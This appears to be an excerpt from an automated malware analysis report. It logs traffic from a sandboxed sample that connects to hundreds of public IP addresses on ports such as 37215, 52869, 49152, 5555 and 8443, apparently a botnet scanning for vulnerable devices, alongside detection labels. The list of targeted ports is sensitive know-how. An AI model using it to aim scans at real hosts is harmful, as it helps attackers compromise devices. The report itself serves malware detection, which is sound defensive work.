Source: global traffic TCP traffic: 58.170.123.16 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 17.229.113.84 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 9.219.58.246 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 67.56.126.36 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 11.216.21.192 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 13.156.98.231 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 152.79.242.212 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 175.195.226.130 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 54.122.133.187 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 197.34.33.4 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 138.81.221.137 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 81.79.57.93 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 152.90.219.150 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 13.59.26.118 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 133.165.216.47 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 130.102.160.74 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 104.86.216.214 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 166.31.23.109 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 179.220.108.237 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 122.120.11.163 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 25.87.237.51 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 5.30.108.246 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 47.57.146.158 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 55.226.166.165 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 39.152.6.71 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 139.235.155.108 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 141.147.122.73 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 137.242.74.67 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 154.192.176.198 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 54.1.124.25 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 219.44.149.12 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 169.240.44.151 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 166.92.12.100 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 128.218.150.32 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 123.55.16.248 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 25.224.91.27 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 200.115.122.89 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 24.1.57.126 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 11.174.186.112 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 90.198.227.113 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 21.235.94.156 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 17.202.225.253 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 65.53.76.53 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 122.42.97.57 ports 1,2,4,5,9,49152
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 32814 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35686 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 81 -> 35686
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:44492 -> 113.200.105.232:8443
Source: global traffic TCP traffic: 192.168.2.23:41188 -> 67.129.160.73:5555
Source: global traffic TCP traffic: 192.168.2.23:56336 -> 184.11.167.170:8443
Source: global traffic TCP traffic: 192.168.2.23:36632 -> 109.102.232.127:5555
Source: global traffic TCP traffic: 192.168.2.23:40794 -> 166.31.23.109:37215
Source: global traffic TCP traffic: 192.168.2.23:50012 -> 35.45.112.6:8443
Source: global traffic TCP traffic: 192.168.2.23:59028 -> 22.144.232.185:8080
Source: global traffic TCP traffic: 192.168.2.23:41930 -> 100.196.47.140:8080
Source: global traffic TCP traffic: 192.168.2.23:38968 -> 55.245.84.60:8080
Source: global traffic TCP traffic: 192.168.2.23:53970 -> 200.186.246.157:7574
Source: global traffic TCP traffic: 192.168.2.23:50484 -> 102.5.129.5:7574
Source: global traffic TCP traffic: 192.168.2.23:57494 -> 137.64.79.56:81
Source: global traffic TCP traffic: 192.168.2.23:41572 -> 185.119.191.5:8443
Source: global traffic TCP traffic: 192.168.2.23:34966 -> 21.235.94.156:37215
Source: global traffic TCP traffic: 192.168.2.23:53738 -> 65.53.76.53:37215
Source: global traffic TCP traffic: 192.168.2.23:38138 -> 171.179.128.100:7574
Source: global traffic TCP traffic: 192.168.2.23:45068 -> 45.25.57.240:8080
Source: global traffic TCP traffic: 192.168.2.23:48750 -> 218.50.181.147:8080
Source: global traffic TCP traffic: 192.168.2.23:46710 -> 126.28.245.2:8080
Source: global traffic TCP traffic: 192.168.2.23:42706 -> 40.107.51.226:8443
Source: global traffic TCP traffic: 192.168.2.23:34180 -> 126.36.55.25:8080
Source: global traffic TCP traffic: 192.168.2.23:39988 -> 90.228.187.181:7574
Source: global traffic TCP traffic: 192.168.2.23:38076 -> 188.126.206.174:8080
Source: global traffic TCP traffic: 192.168.2.23:47250 -> 35.183.126.209:7574
Source: global traffic TCP traffic: 192.168.2.23:53236 -> 125.19.179.159:8080
Source: global traffic TCP traffic: 192.168.2.23:52226 -> 187.0.181.7:8443
Source: global traffic TCP traffic: 192.168.2.23:55502 -> 198.194.3.135:8443
Source: global traffic TCP traffic: 192.168.2.23:41642 -> 180.254.127.131:81
Source: global traffic TCP traffic: 192.168.2.23:54332 -> 179.194.207.199:8443
Source: global traffic TCP traffic: 192.168.2.23:53330 -> 105.25.244.131:8080
Source: global traffic TCP traffic: 192.168.2.23:60190 -> 91.8.221.112:5555
Source: global traffic TCP traffic: 192.168.2.23:48354 -> 118.24.78.63:52869
Source: global traffic TCP traffic: 192.168.2.23:41650 -> 182.6.67.113:52869
Source: global traffic TCP traffic: 192.168.2.23:37162 -> 154.2.250.169:52869
Source: global traffic TCP traffic: 192.168.2.23:39162 -> 93.65.82.228:8080
Source: global traffic TCP traffic: 192.168.2.23:57378 -> 31.215.135.3:8080
Source: global traffic TCP traffic: 192.168.2.23:36702 -> 95.36.0.71:8443
Source: global traffic TCP traffic: 192.168.2.23:33918 -> 186.74.80.35:52869
Source: global traffic TCP traffic: 192.168.2.23:48518 -> 173.122.150.192:8443
Source: global traffic TCP traffic: 192.168.2.23:56510 -> 217.208.181.28:8080
Source: global traffic TCP traffic: 192.168.2.23:56828 -> 144.50.58.60:81
Source: global traffic TCP traffic: 192.168.2.23:41554 -> 16.185.224.54:81
Source: global traffic TCP traffic: 192.168.2.23:60082 -> 49.30.95.191:37215
Source: global traffic TCP traffic: 192.168.2.23:58350 -> 160.111.162.219:8080
Source: global traffic TCP traffic: 192.168.2.23:49632 -> 182.28.59.175:8080
Source: global traffic TCP traffic: 192.168.2.23:46638 -> 152.225.18.120:49152
Source: global traffic TCP traffic: 192.168.2.23:42056 -> 32.23.240.199:8080
Source: global traffic TCP traffic: 192.168.2.23:42232 -> 83.44.15.163:8080
Source: global traffic TCP traffic: 192.168.2.23:39266 -> 173.184.209.182:81
Source: global traffic TCP traffic: 192.168.2.23:36660 -> 213.176.82.108:37215
Source: global traffic TCP traffic: 192.168.2.23:46094 -> 185.189.197.94:52869
Source: global traffic TCP traffic: 192.168.2.23:39130 -> 11.152.191.105:8080
Source: global traffic TCP traffic: 192.168.2.23:43716 -> 219.17.67.235:37215
Source: global traffic TCP traffic: 192.168.2.23:53316 -> 12.186.198.42:8080
Source: global traffic TCP traffic: 192.168.2.23:40416 -> 194.243.196.252:81
Source: global traffic TCP traffic: 192.168.2.23:36448 -> 96.17.16.68:8080
Source: global traffic TCP traffic: 192.168.2.23:32944 -> 112.176.104.27:37215
Source: global traffic TCP traffic: 192.168.2.23:37630 -> 178.182.207.142:5555
Source: global traffic TCP traffic: 192.168.2.23:51470 -> 133.193.211.115:37215
Source: global traffic TCP traffic: 192.168.2.23:53422 -> 6.42.96.227:37215
Source: global traffic TCP traffic: 192.168.2.23:38924 -> 154.44.206.244:8080
Source: global traffic TCP traffic: 192.168.2.23:56090 -> 40.217.232.105:52869
Source: global traffic TCP traffic: 192.168.2.23:57580 -> 131.239.170.174:49152
Source: global traffic TCP traffic: 192.168.2.23:43542 -> 2.176.99.42:7574
Source: global traffic TCP traffic: 192.168.2.23:52996 -> 189.232.159.133:49152
Source: global traffic TCP traffic: 192.168.2.23:43952 -> 126.68.225.175:81
Source: global traffic TCP traffic: 192.168.2.23:57672 -> 11.216.21.192:52869
Source: global traffic TCP traffic: 192.168.2.23:60434 -> 164.17.85.186:8080
Source: global traffic TCP traffic: 192.168.2.23:45776 -> 142.34.122.100:8080
Source: global traffic TCP traffic: 192.168.2.23:42756 -> 157.160.238.119:7574
Source: global traffic TCP traffic: 192.168.2.23:39974 -> 182.70.170.130:52869
Source: global traffic TCP traffic: 192.168.2.23:46428 -> 87.253.23.67:8443
Source: global traffic TCP traffic: 192.168.2.23:42444 -> 40.168.7.236:8080
Source: global traffic TCP traffic: 192.168.2.23:46920 -> 35.122.67.94:8080
Source: global traffic TCP traffic: 192.168.2.23:35208 -> 19.116.56.119:8080
Source: global traffic TCP traffic: 192.168.2.23:41388 -> 28.168.205.128:5555
Source: global traffic TCP traffic: 192.168.2.23:46810 -> 180.89.169.85:8080
Source: global traffic TCP traffic: 192.168.2.23:60502 -> 103.133.112.54:37215
Source: global traffic TCP traffic: 192.168.2.23:46798 -> 49.121.221.50:5555
Source: global traffic TCP traffic: 192.168.2.23:39856 -> 50.26.175.172:7574
Source: global traffic TCP traffic: 192.168.2.23:55124 -> 55.226.166.165:52869
Source: global traffic TCP traffic: 192.168.2.23:38808 -> 216.93.120.15:37215
Source: global traffic TCP traffic: 192.168.2.23:49802 -> 122.42.97.57:49152
Source: global traffic TCP traffic: 192.168.2.23:48480 -> 208.121.43.95:8080
Source: global traffic TCP traffic: 192.168.2.23:43660 -> 104.109.35.63:8443
Source: global traffic TCP traffic: 192.168.2.23:42678 -> 206.105.5.142:8443
Source: global traffic TCP traffic: 192.168.2.23:39712 -> 75.73.55.134:81
Source: global traffic TCP traffic: 192.168.2.23:56110 -> 141.226.112.48:5555
Source: global traffic TCP traffic: 192.168.2.23:33402 -> 34.69.23.176:37215
Source: global traffic TCP traffic: 192.168.2.23:34628 -> 90.26.83.230:8080
Source: global traffic TCP traffic: 192.168.2.23:43266 -> 2.200.21.111:52869
Source: global traffic TCP traffic: 192.168.2.23:55798 -> 9.219.58.246:49152
Source: global traffic TCP traffic: 192.168.2.23:52562 -> 179.28.189.224:52869
Source: global traffic TCP traffic: 192.168.2.23:49274 -> 137.195.163.37:8443
Source: global traffic TCP traffic: 192.168.2.23:56380 -> 162.6.132.254:8080
Source: global traffic TCP traffic: 192.168.2.23:36358 -> 112.65.113.89:8443
Source: global traffic TCP traffic: 192.168.2.23:45098 -> 110.90.55.169:81
Source: global traffic TCP traffic: 192.168.2.23:51500 -> 189.134.48.15:8080
Source: global traffic TCP traffic: 192.168.2.23:45834 -> 83.57.65.59:8080
Source: global traffic TCP traffic: 192.168.2.23:48840 -> 164.96.150.142:8080
Source: global traffic TCP traffic: 192.168.2.23:33918 -> 204.119.212.109:8080
Source: global traffic TCP traffic: 192.168.2.23:54498 -> 79.161.24.176:49152
Source: global traffic TCP traffic: 192.168.2.23:50678 -> 75.174.137.33:8080
Source: global traffic TCP traffic: 192.168.2.23:40166 -> 39.152.6.71:52869
Source: global traffic TCP traffic: 192.168.2.23:38230 -> 213.36.93.175:8443
Source: global traffic TCP traffic: 192.168.2.23:46058 -> 19.113.73.17:8080
Source: global traffic TCP traffic: 192.168.2.23:57428 -> 83.140.37.92:8080
Source: global traffic TCP traffic: 192.168.2.23:38954 -> 130.30.19.29:49152
Source: global traffic TCP traffic: 192.168.2.23:52052 -> 71.137.97.50:81
Source: global traffic TCP traffic: 192.168.2.23:39862 -> 117.145.74.225:7574
Source: global traffic TCP traffic: 192.168.2.23:56700 -> 138.175.204.158:5555
Source: global traffic TCP traffic: 192.168.2.23:35342 -> 195.86.16.208:8080
Source: global traffic TCP traffic: 192.168.2.23:55870 -> 200.115.122.89:37215
Source: global traffic TCP traffic: 192.168.2.23:47842 -> 76.99.198.96:81
Source: global traffic TCP traffic: 192.168.2.23:33144 -> 209.178.207.189:8080
Source: global traffic TCP traffic: 192.168.2.23:38184 -> 4.110.94.140:81
Source: global traffic TCP traffic: 192.168.2.23:55774 -> 123.55.16.248:37215
Source: global traffic TCP traffic: 192.168.2.23:54010 -> 103.166.153.117:5555
Source: global traffic TCP traffic: 192.168.2.23:41684 -> 174.101.66.69:8080
Source: global traffic TCP traffic: 192.168.2.23:54174 -> 31.253.153.1:8443
Source: global traffic TCP traffic: 192.168.2.23:51292 -> 219.44.149.12:49152
Source: global traffic TCP traffic: 192.168.2.23:60694 -> 145.115.91.50:81
Source: global traffic TCP traffic: 192.168.2.23:45460 -> 122.120.11.163:49152
Source: global traffic TCP traffic: 192.168.2.23:35052 -> 81.79.57.93:49152
Source: global traffic TCP traffic: 192.168.2.23:50622 -> 203.222.143.94:8080
Source: global traffic TCP traffic: 192.168.2.23:42000 -> 120.185.75.38:52869
Source: global traffic TCP traffic: 192.168.2.23:48856 -> 89.109.107.87:5555
Source: global traffic TCP traffic: 192.168.2.23:60210 -> 104.69.106.155:81
Source: global traffic TCP traffic: 192.168.2.23:43618 -> 33.219.124.225:8080
Source: global traffic TCP traffic: 192.168.2.23:56282 -> 49.60.182.140:8080
Source: global traffic TCP traffic: 192.168.2.23:36294 -> 106.178.208.243:8080
Source: global traffic TCP traffic: 192.168.2.23:38484 -> 162.119.193.156:7574
Source: global traffic TCP traffic: 192.168.2.23:40120 -> 87.27.190.244:37215
Source: global traffic TCP traffic: 192.168.2.23:44642 -> 126.144.178.253:8443
Source: global traffic TCP traffic: 192.168.2.23:60954 -> 119.236.192.141:37215
Source: global traffic TCP traffic: 192.168.2.23:51592 -> 4.63.252.30:8080
Source: global traffic TCP traffic: 192.168.2.23:53468 -> 54.122.133.187:37215
Source: global traffic TCP traffic: 192.168.2.23:35270 -> 27.49.23.52:49152
Source: global traffic TCP traffic: 192.168.2.23:34590 -> 65.177.53.188:7574
Source: global traffic TCP traffic: 192.168.2.23:54270 -> 72.151.192.215:8080
Source: global traffic TCP traffic: 192.168.2.23:33902 -> 137.207.100.87:8443
Source: global traffic TCP traffic: 192.168.2.23:43854 -> 8.96.114.127:37215
Source: global traffic TCP traffic: 192.168.2.23:33356 -> 75.118.139.121:81
Source: global traffic TCP traffic: 192.168.2.23:56570 -> 126.130.134.110:5555
Source: global traffic TCP traffic: 192.168.2.23:36466 -> 169.173.175.187:81
Source: global traffic TCP traffic: 192.168.2.23:42176 -> 219.210.250.186:7574
Source: global traffic TCP traffic: 192.168.2.23:51170 -> 25.224.91.27:37215
Source: global traffic TCP traffic: 192.168.2.23:54970 -> 12.93.192.60:7574
Source: global traffic TCP traffic: 192.168.2.23:57152 -> 83.219.142.62:8080
Source: global traffic TCP traffic: 192.168.2.23:51284 -> 207.19.171.61:7574
Source: global traffic TCP traffic: 192.168.2.23:36866 -> 197.34.33.4:49152
Source: global traffic TCP traffic: 192.168.2.23:46144 -> 115.149.26.31:7574
Source: global traffic TCP traffic: 192.168.2.23:47296 -> 123.193.230.204:37215
Source: global traffic TCP traffic: 192.168.2.23:43412 -> 1.102.177.191:49152
Source: global traffic TCP traffic: 192.168.2.23:55832 -> 205.138.220.164:81
Source: global traffic TCP traffic: 192.168.2.23:58176 -> 60.91.131.86:52869
Source: global traffic TCP traffic: 192.168.2.23:56040 -> 175.195.226.130:52869
Source: global traffic TCP traffic: 192.168.2.23:34414 -> 116.102.42.120:8080
Source: global traffic TCP traffic: 192.168.2.23:38690 -> 58.170.123.16:37215
Source: global traffic TCP traffic: 192.168.2.23:59552 -> 146.15.194.66:8080
Source: global traffic TCP traffic: 192.168.2.23:52244 -> 152.79.242.212:52869
Source: global traffic TCP traffic: 192.168.2.23:56284 -> 13.169.176.0:81
Source: global traffic TCP traffic: 192.168.2.23:42034 -> 145.78.150.14:52869
Source: global traffic TCP traffic: 192.168.2.23:53522 -> 13.156.98.231:37215
Source: global traffic TCP traffic: 192.168.2.23:50434 -> 147.118.25.160:8080
Source: global traffic TCP traffic: 192.168.2.23:36548 -> 194.212.2.39:8443
Source: global traffic TCP traffic: 192.168.2.23:59884 -> 87.59.59.83:49152
Source: global traffic TCP traffic: 192.168.2.23:43982 -> 217.167.178.11:81
Source: global traffic TCP traffic: 192.168.2.23:35682 -> 76.169.13.149:8443
Source: global traffic TCP traffic: 192.168.2.23:50774 -> 222.215.11.152:5555
Source: global traffic TCP traffic: 192.168.2.23:34392 -> 78.23.102.210:8080
Source: global traffic TCP traffic: 192.168.2.23:46386 -> 102.214.134.194:8443
Source: global traffic TCP traffic: 192.168.2.23:57706 -> 145.137.120.154:8080
Source: global traffic TCP traffic: 192.168.2.23:53496 -> 152.90.219.150:49152
Source: global traffic TCP traffic: 192.168.2.23:33080 -> 121.217.30.81:8443
Source: global traffic TCP traffic: 192.168.2.23:55418 -> 61.60.90.55:81
Source: global traffic TCP traffic: 192.168.2.23:48136 -> 207.174.76.62:8080
Source: global traffic TCP traffic: 192.168.2.23:47076 -> 99.175.24.226:8443
Source: global traffic TCP traffic: 192.168.2.23:39840 -> 54.239.14.65:8080
Source: global traffic TCP traffic: 192.168.2.23:55352 -> 188.227.158.27:5555
Source: global traffic TCP traffic: 192.168.2.23:55068 -> 177.40.229.174:8080
Source: global traffic TCP traffic: 192.168.2.23:37154 -> 46.240.25.117:8443
Source: global traffic TCP traffic: 192.168.2.23:42274 -> 122.173.242.132:7574
Source: global traffic TCP traffic: 192.168.2.23:48528 -> 81.78.52.168:49152
Source: global traffic TCP traffic: 192.168.2.23:40772 -> 47.57.146.158:49152
Source: global traffic TCP traffic: 192.168.2.23:40614 -> 130.120.24.197:7574
Source: global traffic TCP traffic: 192.168.2.23:39650 -> 166.236.5.250:49152
Source: global traffic TCP traffic: 192.168.2.23:53784 -> 149.186.69.66:8080
Source: global traffic TCP traffic: 192.168.2.23:43918 -> 152.114.237.184:8443
Source: global traffic TCP traffic: 192.168.2.23:55114 -> 83.199.233.176:49152
Source: global traffic TCP traffic: 192.168.2.23:34338 -> 130.102.160.74:49152
Source: global traffic TCP traffic: 192.168.2.23:48572 -> 83.122.95.25:8080
Source: global traffic TCP traffic: 192.168.2.23:54086 -> 183.127.20.248:7574
Source: global traffic TCP traffic: 192.168.2.23:37316 -> 126.129.153.234:8443
Source: global traffic TCP traffic: 192.168.2.23:36330 -> 89.43.178.168:7574
Source: global traffic TCP traffic: 192.168.2.23:58492 -> 101.60.186.9:81
Source: global traffic TCP traffic: 192.168.2.23:58570 -> 117.37.15.228:5555
Source: global traffic TCP traffic: 192.168.2.23:53928 -> 105.242.110.44:52869
Source: global traffic TCP traffic: 192.168.2.23:35810 -> 17.202.225.253:37215
Source: global traffic TCP traffic: 192.168.2.23:45248 -> 9.46.120.73:5555
Source: global traffic TCP traffic: 192.168.2.23:39956 -> 59.226.146.96:8080
Source: global traffic TCP traffic: 192.168.2.23:46734 -> 43.120.175.110:7574
Source: global traffic TCP traffic: 192.168.2.23:54376 -> 31.156.62.140:8443
Source: global traffic TCP traffic: 192.168.2.23:59874 -> 124.242.109.222:37215
Source: global traffic TCP traffic: 192.168.2.23:54448 -> 92.100.0.194:7574
Source: global traffic TCP traffic: 192.168.2.23:46262 -> 11.35.71.45:81
Source: global traffic TCP traffic: 192.168.2.23:51938 -> 24.1.57.126:52869
Source: global traffic TCP traffic: 192.168.2.23:56210 -> 96.235.20.121:8080
Source: global traffic TCP traffic: 192.168.2.23:42184 -> 151.21.199.120:5555
Source: global traffic TCP traffic: 192.168.2.23:49564 -> 25.87.237.51:52869
Source: global traffic TCP traffic: 192.168.2.23:43624 -> 66.114.253.203:8443
Source: global traffic TCP traffic: 192.168.2.23:46848 -> 130.111.55.248:8080
Source: global traffic TCP traffic: 192.168.2.23:54586 -> 17.229.113.84:49152
Source: global traffic TCP traffic: 192.168.2.23:55462 -> 133.165.216.47:37215
Source: global traffic TCP traffic: 192.168.2.23:57270 -> 189.247.217.62:5555
Source: global traffic TCP traffic: 192.168.2.23:46802 -> 82.116.24.152:8443
Source: global traffic TCP traffic: 192.168.2.23:33576 -> 25.87.53.113:8080
Source: global traffic TCP traffic: 192.168.2.23:47928 -> 159.42.57.237:49152
Source: global traffic TCP traffic: 192.168.2.23:39132 -> 220.139.122.238:8443
Source: global traffic TCP traffic: 192.168.2.23:48918 -> 60.138.201.97:52869
Source: global traffic TCP traffic: 192.168.2.23:45688 -> 194.204.98.109:49152
Source: global traffic TCP traffic: 192.168.2.23:38136 -> 8.209.26.108:8080
Source: global traffic TCP traffic: 192.168.2.23:57852 -> 115.232.98.88:81
Source: global traffic TCP traffic: 192.168.2.23:48388 -> 145.55.30.154:7574
Source: global traffic TCP traffic: 192.168.2.23:51792 -> 83.22.235.193:8080
Source: global traffic TCP traffic: 192.168.2.23:50816 -> 175.22.201.208:8443
Source: global traffic TCP traffic: 192.168.2.23:41150 -> 88.103.118.246:52869
Source: global traffic TCP traffic: 192.168.2.23:58952 -> 163.96.184.101:5555
Source: global traffic TCP traffic: 192.168.2.23:52400 -> 122.36.114.106:49152
Source: global traffic TCP traffic: 192.168.2.23:50268 -> 30.101.205.242:49152
Source: global traffic TCP traffic: 192.168.2.23:46854 -> 132.219.186.30:8443
Source: global traffic TCP traffic: 192.168.2.23:37044 -> 21.203.17.96:8080
Source: global traffic TCP traffic: 192.168.2.23:44348 -> 31.182.206.13:8080
Source: global traffic TCP traffic: 192.168.2.23:33436 -> 71.10.2.3:52869
Source: global traffic TCP traffic: 192.168.2.23:43158 -> 180.167.207.34:81
Source: global traffic TCP traffic: 192.168.2.23:55370 -> 205.155.133.95:52869
Source: global traffic TCP traffic: 192.168.2.23:50800 -> 184.245.192.241:8443
Source: global traffic TCP traffic: 192.168.2.23:35286 -> 75.61.94.118:8080
Source: global traffic TCP traffic: 192.168.2.23:47884 -> 187.37.64.91:8080
Source: global traffic TCP traffic: 192.168.2.23:58054 -> 42.127.221.91:7574
Source: global traffic TCP traffic: 192.168.2.23:37386 -> 150.179.62.203:52869
Source: global traffic TCP traffic: 192.168.2.23:49404 -> 29.49.149.205:8080
Source: global traffic TCP traffic: 192.168.2.23:60978 -> 86.218.33.164:8080
Source: global traffic TCP traffic: 192.168.2.23:60300 -> 211.199.132.181:81
Source: global traffic TCP traffic: 192.168.2.23:59334 -> 145.76.97.152:8080
Source: global traffic TCP traffic: 192.168.2.23:39052 -> 28.212.76.191:81
Source: global traffic TCP traffic: 192.168.2.23:46556 -> 45.60.67.75:52869
Source: global traffic TCP traffic: 192.168.2.23:49442 -> 154.137.192.46:8080
Source: global traffic TCP traffic: 192.168.2.23:45272 -> 183.56.193.84:49152
Source: global traffic TCP traffic: 192.168.2.23:41866 -> 198.200.177.227:7574
Source: global traffic TCP traffic: 192.168.2.23:36018 -> 98.248.158.185:8080
Source: global traffic TCP traffic: 192.168.2.23:46932 -> 46.208.194.138:52869
Source: global traffic TCP traffic: 192.168.2.23:34928 -> 79.238.9.113:81
Source: global traffic TCP traffic: 192.168.2.23:41954 -> 82.109.48.98:8443
Source: global traffic TCP traffic: 192.168.2.23:38202 -> 110.33.28.139:8080
Source: global traffic TCP traffic: 192.168.2.23:60384 -> 155.163.154.83:81
Source: global traffic TCP traffic: 192.168.2.23:56156 -> 5.159.128.139:49152
Source: global traffic TCP traffic: 192.168.2.23:60500 -> 49.167.144.85:81
Source: global traffic TCP traffic: 192.168.2.23:47954 -> 97.132.168.27:37215
Source: global traffic TCP traffic: 192.168.2.23:54200 -> 118.51.93.48:81
Source: global traffic TCP traffic: 192.168.2.23:48250 -> 57.37.42.243:5555
Source: global traffic TCP traffic: 192.168.2.23:40758 -> 119.44.231.19:52869
Source: global traffic TCP traffic: 192.168.2.23:46212 -> 179.76.176.91:8080
Source: global traffic TCP traffic: 192.168.2.23:34938 -> 120.81.95.181:8080
Source: global traffic TCP traffic: 192.168.2.23:56180 -> 168.48.142.0:81
Source: global traffic TCP traffic: 192.168.2.23:55754 -> 179.82.28.238:81
Source: global traffic TCP traffic: 192.168.2.23:47164 -> 217.41.84.108:7574
Source: global traffic TCP traffic: 192.168.2.23:54920 -> 176.181.36.227:8443
Source: global traffic TCP traffic: 192.168.2.23:47796 -> 174.117.110.102:8080
Source: global traffic TCP traffic: 192.168.2.23:46974 -> 214.65.33.92:7574
Source: global traffic TCP traffic: 192.168.2.23:59426 -> 6.106.185.52:81
Source: global traffic TCP traffic: 192.168.2.23:41420 -> 95.44.206.204:8080
Source: global traffic TCP traffic: 192.168.2.23:50222 -> 143.222.121.131:8080
Source: global traffic TCP traffic: 192.168.2.23:47828 -> 164.68.125.39:8443
Source: global traffic TCP traffic: 192.168.2.23:41100 -> 68.182.20.215:8080
Source: global traffic TCP traffic: 192.168.2.23:33006 -> 15.115.219.33:8080
Source: global traffic TCP traffic: 192.168.2.23:43442 -> 138.81.221.137:49152
Source: global traffic TCP traffic: 192.168.2.23:60426 -> 4.178.77.136:49152
Source: global traffic TCP traffic: 192.168.2.23:55836 -> 111.99.86.156:8080
Source: global traffic TCP traffic: 192.168.2.23:45146 -> 121.219.237.97:81
Source: global traffic TCP traffic: 192.168.2.23:58004 -> 56.116.63.156:8080
Source: global traffic TCP traffic: 192.168.2.23:35940 -> 83.41.162.42:37215
Source: global traffic TCP traffic: 192.168.2.23:55136 -> 181.33.185.159:8080
Source: global traffic TCP traffic: 192.168.2.23:45594 -> 213.118.54.42:8080
Source: global traffic TCP traffic: 192.168.2.23:37082 -> 135.167.144.117:8443
Source: global traffic TCP traffic: 192.168.2.23:46942 -> 71.242.41.195:7574
Source: global traffic TCP traffic: 192.168.2.23:57760 -> 204.137.215.190:8080
Source: global traffic TCP traffic: 192.168.2.23:41600 -> 200.198.64.123:81
Source: global traffic TCP traffic: 192.168.2.23:39322 -> 60.39.118.49:37215
Source: global traffic TCP traffic: 192.168.2.23:53444 -> 45.145.162.29:49152
Source: global traffic TCP traffic: 192.168.2.23:53968 -> 145.223.11.43:8080
Source: global traffic TCP traffic: 192.168.2.23:55614 -> 105.182.26.182:8443
Source: global traffic TCP traffic: 192.168.2.23:52128 -> 9.243.211.10:8080
Source: global traffic TCP traffic: 192.168.2.23:51920 -> 131.207.86.145:8080
Source: global traffic TCP traffic: 192.168.2.23:44304 -> 147.242.54.19:52869
Source: global traffic TCP traffic: 192.168.2.23:39560 -> 20.117.146.33:7574
Source: global traffic TCP traffic: 192.168.2.23:41128 -> 161.49.171.223:7574
Source: global traffic TCP traffic: 192.168.2.23:46458 -> 198.71.123.155:8443
Source: global traffic TCP traffic: 192.168.2.23:38558 -> 138.152.205.148:8080
Source: global traffic TCP traffic: 192.168.2.23:41612 -> 178.252.192.130:37215
Source: global traffic TCP traffic: 192.168.2.23:54770 -> 120.234.0.119:37215
Source: global traffic TCP traffic: 192.168.2.23:38322 -> 11.66.7.4:8080
Source: global traffic TCP traffic: 192.168.2.23:39852 -> 203.103.244.44:5555
Source: global traffic TCP traffic: 192.168.2.23:42006 -> 46.224.230.213:7574
Source: global traffic TCP traffic: 192.168.2.23:47928 -> 8.33.31.17:49152
Source: global traffic TCP traffic: 192.168.2.23:37938 -> 23.136.14.234:8080
Source: global traffic TCP traffic: 192.168.2.23:34706 -> 221.126.105.14:49152
Source: global traffic TCP traffic: 192.168.2.23:47416 -> 145.20.161.88:52869
Source: global traffic TCP traffic: 192.168.2.23:50968 -> 78.209.10.212:8443
Source: global traffic TCP traffic: 192.168.2.23:41190 -> 33.162.5.64:37215
Source: global traffic TCP traffic: 192.168.2.23:48016 -> 133.91.142.122:8080
Source: global traffic TCP traffic: 192.168.2.23:45148 -> 198.195.107.231:37215
Source: global traffic TCP traffic: 192.168.2.23:36540 -> 212.156.248.205:8080
Source: global traffic TCP traffic: 192.168.2.23:38692 -> 99.136.127.2:8080
Source: global traffic TCP traffic: 192.168.2.23:53768 -> 143.54.177.24:37215
Source: global traffic TCP traffic: 192.168.2.23:44880 -> 11.174.186.112:49152
Source: global traffic TCP traffic: 192.168.2.23:49848 -> 34.235.160.60:49152
